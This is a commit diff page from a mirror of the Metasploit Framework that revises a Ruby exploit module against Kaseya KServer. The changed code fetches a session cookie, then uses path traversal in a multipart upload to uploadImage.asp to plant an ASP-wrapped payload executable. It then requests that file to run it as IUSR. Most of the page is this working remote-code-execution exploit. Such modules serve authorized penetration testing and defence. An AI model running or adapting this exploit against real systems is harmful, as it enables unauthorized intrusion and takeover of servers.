infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Fix the arch declaration in uploaded module.

bug/bundler_fix
Thomas Hibbert 2013-11-18 14:49:03 +13:00
parent 636fdfe2d2
commit 60a245b0c3
1 changed files with 41 additions and 21 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

40
modules/exploits/windows/http/kaseya_uploadimage_file_upload.rb Normal file → Executable file
View File

@ -24,7 +24,7 @@ Code executed in this manner runs under the IUSR account.
}, },
'Author' => 'Author' =>
[ [
'Thomas Hibbert' # thomas.hibbert@security-assessment.com 'Thomas Hibbert' # cartel
], ],
'License' => MSF_LICENSE, 'License' => MSF_LICENSE,
'References' => 'References' =>
@ -35,7 +35,7 @@ Code executed in this manner runs under the IUSR account.
'BadChars' => "\x00", 'BadChars' => "\x00",
}, },
'Platform' => 'win', 'Platform' => 'win',
'Arch' => ARCH_x86, 'Arch' => ARCH_X86,
'Targets' => 'Targets' =>
[ [
[ 'Kaseya KServer / Windows', {} ], [ 'Kaseya KServer / Windows', {} ],
@ -62,6 +62,21 @@ Code executed in this manner runs under the IUSR account.
return Exploit::CheckCode::Appears return Exploit::CheckCode::Appears
end end
def get_cookie
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri("SystemTab", "uploadImage.asp")
})
if res and res.headers['Set-Cookie']
cookie = res.headers['Set-Cookie'].scan(/(\w+\=\w+); path\=.+$/).flatten[0]
else
fail_with(Failure::Unknown, "#{@peer} - No cookie found, will not continue")
end
cookie
end
def exploit def exploit
peer = "#{rhost}:#{rport}" peer = "#{rhost}:#{rport}"
@ -69,25 +84,30 @@ Code executed in this manner runs under the IUSR account.
exe = generate_payload_exe exe = generate_payload_exe
asp = Msf::Util::EXE.to_exe_asp(exe) asp = Msf::Util::EXE.to_exe_asp(exe)
data = Rex::MIME::Message.new post_data = Rex::MIME::Message.new
data.add_part(asp, "application/octet-stream", nil, "form-data; name=\"#{payload_name}\"") post_data.add_part(asp, "application/octet-stream", nil, "form-data; name=\"uploadFile\"; filename=\"..\\#{@payload_name}\"")
data = post_data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')
cookie = get_cookie
res = send_request_raw({ res = send_request_raw({
'method' => 'POST', 'method' => 'POST',
'uri' => normalize_uri('SystemTab','uploadImage.asp?filename=..\..\..\#{payload_name}'), 'uri' => normalize_uri('SystemTab','uploadImage.asp?filename=..\..\..\..\\'+@payload_name),
'data' => data, 'data' => data,
'headers' => { 'ctype' => "multipart/form-data; boundary=#{post_data.bound}",
'ctype' => 'multipart/form-data; boundary=#{data.bound}' 'cookie' => cookie
}
}) })
if not res or res.code != 200 if not res or res.code != 200
fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed") fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
end end
print_status("#{peer} - Executing payload #{@payload_name}") print_status("#{peer} - Executing payload #{@payload_name}")
res = send_request_raw({ res = send_request_cgi({
'uri' => normalize_uri(@payload_name), 'uri' => normalize_uri(@payload_name),
'method' => 'GET' 'method' => 'GET'
}) })
end end
end end